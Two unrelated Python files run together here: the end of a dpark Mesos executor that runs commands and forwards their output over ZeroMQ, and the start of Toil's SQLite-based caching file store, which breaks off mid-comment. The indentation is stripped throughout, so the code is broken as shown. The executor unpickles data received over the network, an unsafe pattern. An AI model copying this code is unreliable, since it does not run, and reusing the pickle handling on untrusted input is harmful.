sysp = [p[:-len(P)] for p in sys.path if p.endswith(P)][0]
if sysp != virltualenv:
sys.path = [p.replace(sysp, virltualenv) for p in sys.path]
import os
import pickle
import subprocess
import threading
from threading import Thread
import socket
import zmq
import dpark.pymesos as mesos
from dpark.pymesos import mesos_pb2
ctx = zmq.Context()
def forword(fd, addr, prefix=''):
f = os.fdopen(fd, 'r', 4096)
out = ctx.socket(zmq.PUSH)
out.connect(addr)
while True:
try:
line = f.readline()
if not line: break
out.send(prefix+line)
except IOError:
break
f.close()
out.close()
def reply_status(driver, task_id, status):
update = mesos_pb2.TaskStatus()
update.task_id.MergeFrom(task_id)
update.state = status
driver.sendStatusUpdate(update)
def launch_task(self, driver, task):
reply_status(driver, task.task_id, mesos_pb2.TASK_RUNNING)
host = socket.gethostname()
cwd, command, _env, shell, addr1, addr2, addr3 = pickle.loads(task.data)
prefix = "[%s@%s] " % (str(task.task_id.value), host)
outr, outw = os.pipe()
errr, errw = os.pipe()
t1 = Thread(target=forword, args=[outr, addr1, prefix])
t1.daemon = True
t1.start()
t2 = Thread(target=forword, args=[errr, addr2, prefix])
t2.daemon = True
t2.start()
wout = os.fdopen(outw,'w',0)
werr = os.fdopen(errw,'w',0)
if addr3:
subscriber = ctx.socket(zmq.SUB)
subscriber.connect(addr3)
subscriber.setsockopt(zmq.SUBSCRIBE, '')
poller = zmq.Poller()
poller.register(subscriber, zmq.POLLIN)
socks = dict(poller.poll(60 * 1000))
if socks and socks.get(subscriber) == zmq.POLLIN:
hosts = pickle.loads(subscriber.recv(zmq.NOBLOCK))
line = hosts.get(host)
if line:
command = line.split(' ')
else:
return reply_status(driver, task.task_id, mesos_pb2.TASK_FAILED)
else:
return reply_status(driver, task.task_id, mesos_pb2.TASK_FAILED)
try:
env = dict(os.environ)
env.update(_env)
if not os.path.exists(cwd):
print >>werr, 'CWD %s is not exists, use /tmp instead' % cwd
cwd = '/tmp'
p = subprocess.Popen(command,
stdout=wout, stderr=werr,
cwd=cwd, env=env, shell=shell)
self.ps[task.task_id.value] = p
p.wait()
code = p.returncode
if code == 0 or code is None:
status = mesos_pb2.TASK_FINISHED
else:
print >>werr, ' '.join(command) + ' exit with %s' % code
status = mesos_pb2.TASK_FAILED
except Exception, e:
status = mesos_pb2.TASK_FAILED
import traceback
print >>werr, 'exception while open ' + ' '.join(command)
for line in traceback.format_exc():
werr.write(line)
reply_status(driver, task.task_id, status)
wout.close()
werr.close()
t1.join()
t2.join()
tid = task.task_id.value
self.ps.pop(tid, None)
self.ts.pop(tid, None)
class MyExecutor(mesos.Executor):
def __init__(self):
self.ps = {}
self.ts = {}
def launchTask(self, driver, task):
t = Thread(target=launch_task, args=(self, driver, task))
t.daemon = True
t.start()
self.ts[task.task_id.value] = t
def killTask(self, driver, task_id):
try:
if task_id.value in self.ps:
self.ps[task_id.value].kill()
reply_status(driver, task_id, mesos_pb2.TASK_KILLED)
except: pass
def shutdown(self, driver):
for p in self.ps.values():
try: p.kill()
except: pass
for t in self.ts.values():
t.join()
if __name__ == "__main__":
executor = MyExecutor()
mesos.MesosExecutorDriver(executor).run()
|
cachingFileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from builtins import range
from builtins import object
from abc import abstractmethod, ABCMeta
from collections import namedtuple, defaultdict
from contextlib import contextmanager
from fcntl import flock, LOCK_EX, LOCK_UN
from functools import partial
from future.utils import with_metaclass
from six.moves.queue import Empty, Queue
import base64
import dill
import errno
import hashlib
import logging
import os
import shutil
import sqlite3
import stat
import sys
import tempfile
import threading
import time
import uuid
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.lib.humanize import bytes2human
from toil.lib.misc import mkdir_p, robust_rmtree
from toil.lib.objects import abstractclassmethod
from toil.resource import ModuleDescriptor
from toil.fileStores.abstractFileStore import AbstractFileStore
from toil.fileStores import FileID
logger = logging.getLogger(__name__)
if sys.version_info[0] < 3:
# Define a usable FileNotFoundError as will be raised by os.remove on a
# nonexistent file.
FileNotFoundError = OSError
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
message = 'Unable unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
Error raised if the caching code discovers a file that represents a
reference to a cached file to have gone missing.
This can be a big problem if a hard link is moved, because then the cache
will be unable to evict the file it links to.
Remember that files read with readGlobalFile may not be deleted by the user
and need to be deleted with deleteLocalFile.
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) has been deleted or moved by user ' \
' without updating cache database. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
class CachingFileStore(AbstractFileStore):
"""
A cache-enabled file store.
Provides files that are read out as symlinks or hard links into a cache
directory for the node, if permitted by the workflow.
Also attempts to write files back to the backing JobStore asynchronously,
after quickly taking them into the cache. Writes are only required to
finish when the job's actual state after running is committed back to the
job store.
Internaly, manages caching using a database. Each node has its own
database, shared between all the workers on the node. The database contains
several tables:
files contains one entry for each file in the cache. Each entry knows the
path to its data on disk. It also knows its global file ID, its state, and
its owning worker PID. If the owning worker dies, another worker will pick
it up. It also knows its size.
File states are:
- "cached": happily stored in the cache. Reads can happen immediately.
Owner is null. May be adopted and moved to state "deleting" by anyone, if
it has no outstanding immutable references.
- "downloading": in the process of being saved to the cache by a non-null
owner. Reads must wait for the state to become "cached". If the worker
dies, goes to state "deleting", because we don't know if it was fully
downloaded or if anyone still needs it. No references can be created to a
"downloading" file except by the worker responsible for downloading it.
- "uploadable": stored in the cache and ready to be written to the job
store by a non-null owner. Transitions to "uploading" when a (thread of)
the owning worker process picks it up and begins uploading it, to free
cache space or to commit a completed job. If the worker dies, goes to
state "cached", because it may have outstanding immutable references from
the dead-but-not-cleaned-up job that was going to write it.
- "uploading": stored in the cache and being written to the job store by a
non-null owner. Transitions to "cached" when successfully uploaded. If
the worker dies, goes to state "cached", because it may have outstanding
immutable references from the dead-but-not-cleaned-up job that was
writing it.
- "deleting": in the process of being removed from the cache by a non-null
owner. Will eventually be removed from the database.
refs contains one entry for each outstanding reference to a cached file
(hard link, symlink, or full copy). The table name is refs instead of
references because references is an SQL reserved word. It remembers what
job ID has the reference, and the path the reference is at. References have
three states:
- "immutable": represents a hardlink or symlink to a file in the cache.
Dedicates the file's size in bytes of the job's disk requirement to the
cache, to be used to cache this file or to keep around other files
without references. May be upgraded to "copying" if the link can't
actually be created.
- "copying": records that a file in the cache is in the process of being
copied to a path. Will be upgraded to a mutable reference eventually.
- "mutable": records that a file from the cache was copied to a certain
path. Exist only to support deleteLocalFile's API. Only files with only
mutable references (or no references) are eligible for eviction.
jobs contains one entry for each job currently running. It keeps track of
the job's ID, the worker that is supposed to be running the job, the job's
disk requirement, and the job's local temp dir path that will need to be
cleaned up. When workers check for jobs whose workers have died, they null
out the old worker, and grab ownership of and clean up jobs and their
references until the null-worker jobs are gone.
properties contains key, value pairs for tracking total space available,
and whether caching is free for this run.
"""
def __init__(self, jobStore, jobGraph, localTempDir, waitForPreviousCommit, forceNonFreeCaching=False):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, waitForPreviousCommit)
# For testing, we have the ability to force caching to be non-free, by never linking from the file store
self.forceNonFreeCaching = forceNonFreeCaching
# Variables related to caching
# Decide where the cache directory will be. We put it next to the
# local temp dirs for all of the jobs run on this machine.
# At this point in worker startup, when we are setting up caching,
# localTempDir is the worker directory, not the job directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
# Since each worker has it's own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can track some stuff about the running job in ourselves.
self.jobName = str(self.jobGraph)
self.jobID = self.jobGraph.jobStoreID
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# When the job actually starts, we will fill this in with the job's disk requirement.
self.jobDiskBytes = None
# We need to track what attempt of the workflow we are, to prevent crosstalk between attempts' caches.
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# Make sure the cache directory exists
mkdir_p(self.localCacheDir)
# Connect to the cache database in there, or create it if not present
self.dbPath = os.path.join(self.localCacheDir, 'cache-{}.db'.format(self.workflowAttemptNumber))
# We need to hold onto both a connection (to commit) and a cursor (to actually use the database)
self.con = sqlite3.connect(self.dbPath)
self.cur = self.con.cursor()
# Note that sqlite3 automatically starts a transaction when we go to
# modify the database.
# To finish this transaction and let other people read our writes (or
# write themselves), we need to COMMIT after every coherent set of
# writes.
# Make sure to register this as the current database, clobbering any previous attempts.
# We need this for shutdown to be able to find the database from the most recent execution and clean up all its files.
linkDir = tempfile.mkdtemp(dir=self.localCacheDir)
linkName = os.path.join(linkDir, 'cache.db')
os.link(self.dbPath, linkName)
os.rename(linkName, os.path.join(self.localCacheDir, 'cache.db'))
if os.path.exists(linkName):
# TODO: How can this file exist if it got renamed away?
os.unlink(linkName)
os.rmdir(linkDir)
assert(os.path.exists(os.path.join(self.localCacheDir, 'cache.db')))
assert(os.stat(os.path.join(self.localCacheDir, 'cache.db')).st_ino == os.stat(self.dbPath).st_ino)
# Set up the tables
self._ensureTables(self.con)
# Initialize the space accounting properties
freeSpace, _ = getFileSystemSize(self.localCacheDir)
self.cur.execute('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('maxSpace', freeSpace))
self.con.commit()
# Space used by caching and by jobs is accounted with queries
# We maintain an asynchronous upload thread, which gets kicked off when
# we commit the job's completion. It will be None until then. When it
# is running, it has exclusive control over our database connection,
# because the job we exist for will have already completed. However, it
# has to coordinate its activities with other CachingFileStore objects
# in the same process (and thus sharing the same PID) and ensure that
# only one of them is working on uploading any given file at any given
# time.
self.commitThread = None
@classmethod
def _ensureTables(cls, con):
"""
Ensure that the database tables we expect exist.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS files (
id TEXT NOT NULL PRIMARY KEY,
path TEXT UNIQUE NOT NULL,
size INT NOT NULL,
state TEXT NOT NULL,
owner INT
)
""")
cur.execute("""
CREATE TABLE IF NOT EXISTS refs (
path TEXT NOT NULL,
file_id TEXT NOT NULL,
job_id TEXT NOT NULL,
state TEXT NOT NULL,
PRIMARY KEY (path, file_id)
)
""")
cur.execute("""
CREATE TABLE IF NOT EXISTS jobs (
id TEXT NOT NULL PRIMARY KEY,
tempdir TEXT NOT NULL,
disk INT NOT NULL,
worker INT
)
""")
cur.execute("""
CREATE TABLE IF NOT EXISTS properties (
name TEXT NOT NULL PRIMARY KEY,
value INT NOT NULL
)
""")
con.commit()
# Caching-specific API
def getCacheLimit(self):
"""
Return the total number of bytes to which the cache is limited.
If no limit is available, raises an error.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('maxSpace',)):
return row[0]
raise RuntimeError('Unable to retrieve cache limit')
def getCacheUsed(self):
"""
Return the total number of bytes used in the cache.
If no value is available, raises an error.
"""
# Space never counts as used if caching is free
if self.cachingIsFree():
return 0
for row in self.cur.execute('SELECT TOTAL(size) FROM files'):
return row[0]
raise RuntimeError('Unable to retrieve cache usage')
def getCacheExtraJobSpace(self):
"""
Return the total number of bytes of disk space requested by jobs
running against this cache but not yet used.
We can get into a situation where the jobs on the node take up all its
space, but then they want to write to or read from the cache. So when
that happens, we need to debit space from them somehow...
If no value is available, raises an error.
"""
# Total up the sizes of all the reads of files and subtract it from the total disk reservation of all jobs
for row in self.cur.execute("""
SELECT (
(SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state == 'immutable')
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve extra job space')
def getCacheAvailable(self):
"""
Return the total number of free bytes available for caching, or, if
negative, the total number of bytes of cached files that need to be
evicted to free up enough space for all the currently scheduled jobs.
If no value is available, raises an error.
"""
# Get the max space on our disk.
# Subtract out the number of bytes of cached content.
# Also subtract out the number of bytes of job disk requirements that
# aren't being spent by those jobs on immutable references to cached
# content.
# Do a little report first
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
logger.debug('Max space: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(size) FROM files"):
logger.debug('Total file size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(disk) FROM jobs"):
logger.debug('Total job disk requirement size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'"):
logger.debug('Total immutable reference size: %d', row[0])
if self.cachingIsFree():
# If caching is free, we just say that all the space is always available.
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(size) FROM files) -
((SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'))
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
def getSpaceUsableForJobs(self):
"""
Return the total number of bytes that are not taken up by job requirements, ignoring files and file usage.
We can't ever run more jobs than we actually have room for, even with caching.
If not retrievable, raises an error.
"""
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(disk) FROM jobs)
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve usabel space for jobs')
def getCacheUnusedJobRequirement(self):
"""
Return the total number of bytes of disk space requested by the current
job and not used by files the job is using in the cache.
Mutable references don't count, but immutable/uploading ones do.
If no value is available, raises an error.
"""
logger.debug('Get unused space for job %s', self.jobID)
for row in self.cur.execute('SELECT * FROM files'):
logger.debug('File record: %s', str(row))
for row in self.cur.execute('SELECT * FROM refs'):
logger.debug('Ref record: %s', str(row))
for row in self.cur.execute('SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.job_id = ? AND refs.state != ?',
(self.jobID, 'mutable')):
# Sum up all the sizes of our referenced files, then subtract that from how much we came in with
return self.jobDiskBytes - row[0]
raise RuntimeError('Unable to retrieve unused job requirement space')
def adjustCacheLimit(self, newTotalBytes):
"""
Adjust the total cache size limit to the given number of bytes.
"""
self.cur.execute('UPDATE properties SET value = ? WHERE name = ?', (newTotalBytes, 'maxSpace'))
self.con.commit()
def fileIsCached(self, fileID):
"""
Return true if the given file is currently cached, and false otherwise.
Note that this can't really be relied upon because a file may go cached
-> deleting after you look at it. If you need to do something with the
file you need to do it in a transaction.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(fileID, 'cached', 'uploadable', 'uploading')):
return row[0] > 0
return False
def getFileReaderCount(self, fileID):
"""
Return the number of current outstanding reads of the given file.
Counts mutable references too.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE file_id = ?', (fileID,)):
return row[0]
return 0
def cachingIsFree(self):
"""
Return true if files can be cached for free, without taking up space.
Return false otherwise.
This will be true when working with certain job stores in certain
configurations, most notably the FileJobStore.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('freeCaching',)):
return row[0] == 1
# Otherwise we need to set it
from toil.jobStores.fileJobStore import FileJobStore
if isinstance(self.jobStore, FileJobStore) and not self.forceNonFreeCaching:
# Caching may be free since we are using a file job store.
# Create an empty file.
emptyID = self.jobStore.getEmptyFileStoreID()
# Read it out to a generated name.
destDir = tempfile.mkdtemp(dir=self.localCacheDir)
cachedFile = os.path.join(destDir, 'sniffLinkCount')
self.jobStore.readFile(emptyID, cachedFile, symlink=False)
# Check the link count
if os.stat(cachedFile).st_nlink == 2:
# Caching must be free
free = 1
else:
# If we only have one link, caching costs disk.
free = 0
# Clean up
os.unlink(cachedFile)
os.rmdir(destDir)
self.jobStore.deleteFile(emptyID)
else:
# Caching is only ever free with the file job store
free = 0
# Save to the database if we're the first to work this out
self.cur.execute('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('freeCaching', free))
self.con.commit()
# Return true if we said caching was free
return free == 1
# Internal caching logic
def _getNewCachingPath(self, fileStoreID):
"""
Get a path at which the given file ID can be cached.
Will be unique for every call.
The file will not be created if it does not exist.
"""
# Hash the file ID
hasher = hashlib.sha1()
hasher.update(fileStoreID.encode('utf-8'))
# Get a unique temp file name, including the file ID's hash to make
# sure we can never collide even though we are going to remove the
# file.
# TODO: use a de-slashed version of the ID instead?
handle, path = tempfile.mkstemp(dir=self.localCacheDir, suffix=hasher.hexdigest())
os.close(handle)
os.unlink(path)
return path
def _stealWorkFromTheDead(self):
"""
Take ownership of any files we can see whose owners have died.
We don't actually process them here. We take action based on the states of files we own later.
"""
pid = os.getpid()
# Get a list of all file owner processes on this node.
# Exclude NULL because it comes out as 0 and we can't look for PID 0.
owners = []
for row in self.cur.execute('SELECT DISTINCT owner FROM files WHERE owner IS NOT NULL'):
owners.append(row[0])
# Work out which of them have died.
# TODO: use GUIDs or something to account for PID re-use?
deadOwners = []
for owner in owners:
if not self._pidExists(owner):
deadOwners.append(owner)
for owner in deadOwners:
# Try and adopt all the files that any dead owner had
# If they were deleting, we delete
self.cur.execute('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(pid, 'deleting', owner, 'deleting'))
# If they were downloading, we delete. Any outstanding references
# can't be in use since they are from the dead downloader.
self.cur.execute('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(pid, 'deleting', owner, 'downloading'))
# If they were uploading or uploadable, we mark as cached even
# though it never made it to the job store (and leave it unowned).
#
# Once the dead job that it was being uploaded from is cleaned up,
# and there are no longer any immutable references, it will be
# evicted as normal. Since the dead job can't have been marked
# successfully completed (since the file is still not uploaded),
# nobody is allowed to actually try and use the file.
#
# TODO: if we ever let other PIDs be responsible for writing our
# files asynchronously, this will need to change.
self.cur.execute('UPDATE files SET owner = NULL, state = ? WHERE owner = ? AND (state = ? OR state = ?)',
('cached', owner, 'uploadable', 'uploading'))
self.con.commit()
logger.debug('Tried to adopt file operations from dead worker %d', owner)
@classmethod
def _executePendingDeletions(cls, con, cur):
"""
Delete all the files that are registered in the database as in the
process of being deleted from the cache by us.
Returns the number of files that were deleted.
Implemented as a class method so it can use the database connection
appropriate to its thread without any chance of getting at the main
thread's connection and cursor in self.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
pid = os.getpid()
# Remember the file IDs we are deleting
deletedFiles = []
for row in cur.execute('SELECT id, path FROM files WHERE owner = ? AND state = ?', (pid, 'deleting')):
# Grab everything we are supposed to delete and delete it
fileID = row[0]
filePath = row[1]
try:
os.unlink(filePath)
except OSError:
# Probably already deleted
continue
# Whether we deleted the file or just found out that it is gone, we
# need to take credit for deleting it so that we remove it from the
# database.
deletedFiles.append(fileID)
for fileID in deletedFiles:
# Drop all the files. They should have stayed in deleting state. We move them from there to not present at all.
cur.execute('DELETE FROM files WHERE id = ? AND state = ?', (fileID, 'deleting'))
# Also drop their references, if they had any from dead downloaders.
cur.execute('DELETE FROM refs WHERE file_id = ?', (fileID,))
con.commit()
return len(deletedFiles)
def _executePendingUploads(self, con, cur):
"""
Uploads all files in uploadable state that we own.
Returns the number of files that were uploaded.
Needs access to self to get at the job store for uploading files, but
still needs to take con and cur so it can run in a thread with the
thread's database connection.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
# Work out who we are
pid = os.getpid()
# Record how many files we upload
uploadedCount = 0
while True:
# Try and find a file we might want to upload
fileID = None
filePath = None
for row in cur.execute('SELECT id, path FROM files WHERE state = ? AND owner = ? LIMIT 1', ('uploadable', pid)):
fileID = row[0]
filePath = row[1]
if fileID is None:
# Nothing else exists to upload
break
# We need to set it to uploading in a way that we can detect that *we* won the update race instead of anyone else.
cur.execute('UPDATE files SET state = ? WHERE id = ? AND state = ?', ('uploading', fileID, 'uploadable'))
con.commit()
if cur.rowcount != 1:
# We didn't manage to update it. Someone else (a running job if
# we are a committing thread, or visa versa) must have grabbed
# it.
logger.debug('Lost race to upload %s', fileID)
# Try again to see if there is something else to grab.
continue
# Upload the file
logger.debug('Actually executing upload for file %s', fileID)
self.jobStore.updateFile(fileID, filePath)
# Count it for the total uploaded files value we need to return
uploadedCount += 1
# Remember that we uploaded it in the database
cur.execute('UPDATE files SET state = ?, owner = NULL WHERE id = ?', ('cached', fileID))
con.commit()
return uploadedCount
def _allocateSpaceForJob(self, newJobReqs):
"""
A new job is starting that needs newJobReqs space.
We need to record that we have a job running now that needs this much space.
We also need to evict enough stuff from the cache so that we have room
for this job to fill up that much space even if it doesn't cache
anything.
localTempDir must have already been pointed to the job's temp dir.
:param float newJobReqs: the total number of bytes that this job requires.
"""
# Put an entry in the database for this job being run on this worker.
# This will take up space for us and potentially make the cache over-full.
# But we won't actually let the job run and use any of this space until
# the cache has been successfully cleared out.
pid = os.getpid()
self.cur.execute('INSERT INTO jobs VALUES (?, ?, ?, ?)', (self.jobID, self.localTempDir, newJobReqs, pid))
self.con.commit()
# Now we need to make sure that we can fit all currently cached files,
# and the parts of the total job requirements not currently spent on
# cached files, in under the total disk space limit.
available = self.getCacheAvailable()
logger.debug('Available space with job: %d bytes', available)
if available >= 0:
# We're fine on disk space
return
# Otherwise we need to clear stuff.
self._freeUpSpace()
@classmethod
def _removeJob(cls, con, cur, jobID):
"""
Get rid of the job with the given ID.
The job must be owned by us.
Deletes the job's database entry, all its references, and its whole
temporary directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param str jobID: Hash-based ID of the job being removed. Not a Toil JobStore ID.
"""
# Get the job's temp dir
for row in cur.execute('SELECT tempdir FROM jobs WHERE id = ?', (jobID,)):
jobTemp = row[0]
for row in cur.execute('SELECT path FROM refs WHERE job_id = ?', (jobID,)):
try:
# Delete all the reference files.
os.unlink(row[0])
except OSError:
# May not exist
pass
# And their database entries
cur.execute('DELETE FROM refs WHERE job_id = ?', (jobID,))
con.commit()
try:
# Delete the job's temp directory to the extent that we can.
shutil.rmtree(jobTemp)
except OSError:
pass
# Strike the job from the database
cur.execute('DELETE FROM jobs WHERE id = ?', (jobID,))
con.commit()
def _deallocateSpaceForJob(self):
"""
Our current job that was using oldJobReqs space has finished.
We need to record that the job is no longer running, so its space not
taken up by files in the cache will be free.
"""
self._removeJob(self.con, self.cur, self.jobID)
def _tryToFreeUpSpace(self):
"""
If disk space is overcommitted, try one round of collecting files to upload/download/delete/evict.
Return whether we manage to get any space freed or not.
"""
# First we want to make sure that dead jobs aren't holding
# references to files and keeping them from looking unused.
self._removeDeadJobs(self.con)
# Adopt work from any dead workers
self._stealWorkFromTheDead()
if self._executePendingDeletions(self.con, self.cur) > 0:
# We actually had something to delete, which we deleted.
# Maybe there is space now
logger.debug('Successfully executed pending deletions to free space')
return True
if self._executePendingUploads(self.con, self.cur) > 0:
# We had something to upload. Maybe it can be evicted now.
logger.debug('Successfully executed pending uploads to free space')
return True
# Otherwise, not enough files could be found in deleting state to solve our problem.
# We need to put something into the deleting state.
# TODO: give other people time to finish their in-progress
# evictions before starting more, or we might evict everything as
# soon as we hit the cache limit.
# Find something that has no non-mutable references and is not already being deleted.
self.cur.execute("""
SELECT files.id FROM files WHERE files.state = 'cached' AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
) LIMIT 1
""")
row = self.cur.fetchone()
if row is None:
# Nothing can be evicted by us.
# Someone else might be in the process of evicting something that will free up space for us too.
# Or someone mught be uploading something and we have to wait for them to finish before it can be deleted.
logger.debug('Could not find anything to evict! Cannot free up space!')
return False
# Otherwise we found an eviction candidate.
fileID = row[0]
# Work out who we are
pid = os.getpid()
# Try and grab it for deletion, subject to the condition that nothing has started reading it
self.cur.execute("""
UPDATE files SET owner = ?, state = ? WHERE id = ? AND state = ?
AND owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(pid, 'deleting', fileID, 'cached'))
self.con.commit()
logger.debug('Evicting file %s', fileID)
# Whether we actually got it or not, try deleting everything we have to delete
if self._executePendingDeletions(self.con, self.cur) > 0:
# We deleted something
logger.debug('Successfully executed pending deletions to free space')
return True
def _freeUpSpace(self):
"""
If disk space is overcomitted, block and evict eligible things from the
cache until it is no longer overcommitted.
"""
availableSpace = self.getCacheAvailable()
# Track how long we are willing to wait for cache space to free up without making progress evicting things before we give up.
# This is the longes that we will wait for uploads and other deleters.
patience = 10
while availableSpace < 0:
# While there isn't enough space for the thing we want
logger.debug('Cache is full (%d bytes free). Trying to free up space!', availableSpace)
# Free up space. See if we made any progress
progress = self._tryToFreeUpSpace()
availableSpace = self.getCacheAvailable()
if progress:
# Reset our patience
patience = 10
else:
# See if we've been oversubscribed.
jobSpace = self.getSpaceUsableForJobs()
if jobSpace < 0:
logger.critical('Jobs on this machine have oversubscribed our total available space (%d bytes)!', jobSpace)
raise CacheUnbalancedError
else:
patience -= 1
if patience <= 0:
logger.critical('Waited implausibly long for active uploads and deletes.')
raise CacheUnbalancedError
else:
# Wait a bit and come back
time.sleep(2)
logger.debug('Cache has %d bytes free.', availableSpace)
# Normal AbstractFileStore API
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
# Move self.localTempDir from the worker directory set up in __init__ to a per-job directory.
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the database, clean them up ourselves.
self._removeDeadJobs(self.con)
# Get the requirements for the job.
self.jobDiskBytes = job.disk
logger.debug('Actually running job (%s) with ID (%s) which wants %d of our %d bytes.',
self.jobName, self.jobID, self.jobDiskBytes, self.getCacheLimit())
# Register the current job as taking this much space, and evict files
# from the cache to make room before letting the job run.
self._allocateSpaceForJob(self.jobDiskBytes)
try:
os.chdir(self.localTempDir)
yield
finally:
# See how much disk space is used at the end of the job.
# Not a real peak disk usage, but close enough to be useful for warning the user.
# TODO: Push this logic into the abstract file store
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / self.jobDiskBytes * 100 if
self.jobDiskBytes > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(self.jobDiskBytes),
requestedDisk=self.jobDiskBytes))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > self.jobDiskBytes:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
# Go back up to the per-worker local temp directory.
os.chdir(startingDir)
self.cleanupInProgress = True
# Record that our job is no longer using its space, and clean up
# its temp dir and database entry.
self._deallocateSpaceForJob()
def writeGlobalFile(self, localFileName, cleanup=False):
# Work out the file itself
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# And get its size
fileSize = os.stat(absLocalFileName).st_size
# Work out who is making the file
creatorID = self.jobGraph.jobStoreID
# Create an empty file to get an ID.
# TODO: this empty file could leak if we die now...
fileID = self.jobStore.getEmptyFileStoreID(creatorID, cleanup)
# Work out who we are
pid = os.getpid()
# Work out where the file ought to go in the cache
cachePath = self._getNewCachingPath(fileID)
# Create a file in uploadable state and a reference, in the same transaction.
# Say the reference is an immutable reference
self.cur.execute('INSERT INTO files VALUES (?, ?, ?, ?, ?)', (fileID, cachePath, fileSize, 'uploadable', pid))
self.cur.execute('INSERT INTO refs VALUES (?, ?, ?, ?)', (absLocalFileName, fileID, creatorID, 'immutable'))
self.con.commit()
if absLocalFileName.startswith(self.localTempDir):
# We should link into the cache, because the upload is coming from our local temp dir
try:
# Try and hardlink the file into the cache.
# This can only fail if the system doesn't have hardlinks, or the
# file we're trying to link to has too many hardlinks to it
# already, or something.
os.link(absLocalFileName, cachePath)
linkedToCache = True
logger.debug('Linked file %s into cache at %s; deferring write to job store', localFileName, cachePath)
# Don't do the upload now. Let it be deferred until later (when the job is committing).
except OSError:
# We couldn't make the link for some reason
linkedToCache = False
else:
# The tests insist that if you are uploading a file from outside
# the local temp dir, it should not be linked into the cache.
linkedToCache = False
if not linkedToCache:
# If we can't do the link into the cache and upload from there, we
# have to just upload right away. We can't guarantee sufficient
# space to make a full copy in the cache, if we aren't allowed to
# take this copy away from the writer.
# Change the reference to 'mutable', which it will be
